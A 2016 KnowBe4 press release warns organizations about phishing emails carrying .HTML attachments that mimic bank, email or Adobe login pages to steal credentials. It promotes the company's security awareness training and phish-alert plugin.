While ransomware attacks and new strains explode, organizations are reminded to be aware of new forms of social engineering that leave them open to attack
(Tampa Bay, FL) May 12, 2016-- KnowBe4, the US’s most popular security awareness training and integrated phishing platform, warned customers this week of a new wave of social engineering tactics being introduced by cyber criminals. While ransomware continues to surge, a new form of social engineering attack is showing up, bypassing antivirus and secure email gateway products: malicious attachments using the HTML format which is used by banks for secure messaging.
KnowBe4’s phish-alert button (free plugin for Outlook, Office 365, Gmail and Notes) allows users to send suspicious phishing emails to IT or an internal incident response team with just one click. From these alerts, KnowBe4 analyzes which phishing attempts are making it through all the filters.
Over the past six to nine months .DOC and .JS file attachments have dominated the news surrounding the rise in phishing attacks. The reasons are obvious and understandable: those two file types (usually packaged in .ZIP files) are commonly used to deliver extremely dangerous ransomware and banker trojans. However, employees should be trained to be wary of another file type that now can be a malicious attachment: .HTML files.
KnowBe4 CEO Stu Sjouwerman said, “Fresh KnowBe4 Lab analysis shows that although not nearly as prevalent as .JS and .DOC file attachments, .HTML attachments are now potentially dangerous enough that we alert our customers and organizations in general to adjust their email gateway filters to include .HTML attachments if possible, and train their users to be aware.”
- Bank credentials phishes are a familiar affair. The email body warns recipients of some urgent problem or issue requiring them to log in to their online bank accounts. The HTML pages used for these phishes more often resemble the targeted bank's home page than any actual HTML attachment used by a bank.
- The bad guys also spoof popular online services, creating login pages that are nearly indistinguishable from the real thing. However, not all spoofed login forms are service or brand specific. KnowBe4 has seen an increasing number of brand-agnostic email login forms, delivered both as .HTML attachments and live online web pages. Although this .HTML attachment prominently features the Google brand, it advertises to victims that the form will accept credentials for any manner of email address or account. Users could easily use their work email logins, opening a door directly into their employers' corporate networks.
- Bad guys often use the ruse of spoofing a secure document or message delivery service to trick users into opening potentially malicious file or coughing up secure credentials. Such as use of an Adobe ID login.
Sjouwerman also noted, “ Your best defense is to educate users. Employees who aren't security awareness trained often work with relatively simple models of how the online threat landscapes operate. While many users may recognize that .EXE and .PDF files are potentially dangerous or "bad," those same users will likely regard .HTML attachments as harmless and "good." Employees need to be educated about the wide variety of potentially malicious email attachments -- including .HTML attachments -- they may encounter in their inboxes.”
Effective training and frequent simulated phishing attacks are a vital step managing the problem of social engineering and enabling employees to recognize and correctly respond to the actual threats they will encounter.
For more information visit: www.KnowBe4.com
About Stu Sjouwerman and KnowBe4
Stu Sjouwerman (pronounced “shower-man”) is the founder and CEO of KnowBe4, LLC, which hosts the world’s most popular integrated Security Awareness Training and Simulated Phishing platform. A data security expert with more than 30 years in the IT industry, Sjouwerman was the co-founder of Inc. 500 company Sunbelt Software, a multiple award-winning anti-malware software company that was acquired 2010. Realizing that the human element of security was being seriously neglected, Sjouwerman decided to help organizations manage the problem of cybercrime social engineering tactics through new school security awareness training. More than 4000 organizations in a variety of industries, including highly-regulated fields such as healthcare, finance, energy, government and insurance have mobilized their end users as a first line of defense using KnowBe4. Sjouwerman is the author of four books, with his latest being “Cyberheist: The Biggest Financial Threat Facing American Businesses.”